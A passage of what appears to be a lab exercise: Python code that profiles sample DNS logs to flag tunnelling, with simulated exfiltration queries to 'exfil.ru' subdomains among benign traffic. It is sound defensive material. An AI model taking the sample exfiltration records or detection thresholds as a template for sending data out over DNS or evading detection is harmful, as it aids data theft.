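    _dns("2021-09-20T11:00:03", "10.0.1.13", "e19a44.doc.exfil.ru"),
    _dns("2021-09-20T11:00:04", "10.0.1.14", "0f3c8d.doc.exfil.ru"),
    _dns("2021-09-20T11:00:05", "10.0.1.15", "a8e2b1.doc.exfil.ru"),
    _dns("2021-09-20T11:00:06", "10.0.1.16", "55d7c0.doc.exfil.ru"),
    _dns("2021-09-20T11:00:07", "10.0.1.17", "c3b9e6.doc.exfil.ru"),
    _dns("2021-09-20T11:00:08", "10.0.1.18", "9a1f27.doc.exfil.ru"),
    _dns("2021-09-20T11:00:09", "10.0.1.11", "Doc.exfil.ru"),
    _dns("2021-09-20T11:00:10", "10.0.1.20", "doc.exfil.ru"),
    _dns("2021-09-20T11:01:00", "10.0.1.11", "www.example.com"),
    _dns("2021-09-20T11:01:01", "10.0.1.12", "www.example.com"),
    _dns("2021-09-20T11:01:02", "10.0.1.13", "www.example.com"),
    _dns("2021-09-20T11:01:03", "10.0.1.14", "www.example.com"),
    _dns("2021-09-20T11:01:04", "10.0.1.15", "mail.example.com"),
    _dns("2021-09-20T11:01:05", "10.0.1.16", "mail.example.com"),
    _dns("2021-09-20T11:02:00", "10.0.1.17", "updates.vendor.example"),
]


def registered_domain(qname):
    """Last two labels, lower-cased; a real deployment would use a public suffix list."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def queries_for_suffix(events, suffix):
    """Equivalent of `| search DNS.query=*<suffix>` (glob match, so no label boundary)."""
    suffix = suffix.lower()
    return [e for e in events if e["query"].lower().rstrip(".").endswith(suffix)]


def profile_domains(events):
    """Per registered domain: volume, spread of hosts, and how unique the names are."""
    acc = defaultdict(lambda: {"queries": 0, "src": set(), "qnames": set(), "qname_len": 0})
    for e in events:
        a = acc[registered_domain(e["query"])]
        a["queries"] += 1
        a["src"].add(e["src"])
        a["qnames"].add(e["query"].lower().rstrip("."))
        a["qname_len"] += len(e["query"])
    profile = {}
    for domain, a in acc.items():
        n = a["queries"]
        distinct = len(a["qnames"])
        ratio = distinct / n
        profile[domain] = {
            "queries": n,
            "distinct_src": len(a["src"]),
            "distinct_qnames": distinct,
            "unique_ratio": round(ratio, 2),
            "avg_qname_len": round(a["qname_len"] / n, 1),
            # many one-off names under one domain is the tunnelling signature
            "flagged": distinct >= MIN_DISTINCT_QNAMES and ratio >= UNIQUE_RATIO,
        }
    return profile


def suspicious_domains(events):
    """Flagged domains, busiest first."""
    p = profile_domains(events)
    return sorted((d for d, v in p.items() if v["flagged"]), key=lambda d: -p[d]["queries"])


if __name__ == "__main__":
    for domain, v in profile_domains(SAMPLE_DNS).items():
        print(domain, v)
    print("suspicious:", suspicious_domains(SAMPLE_DNS))
```

On this sample exfil.ru is flagged (ten queries, nine distinct names, nine distinct hosts), while example.com, with six queries for only two names, is not; queries_for_suffix reproduces the ten hits the lab's *exfil.ru search returns.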
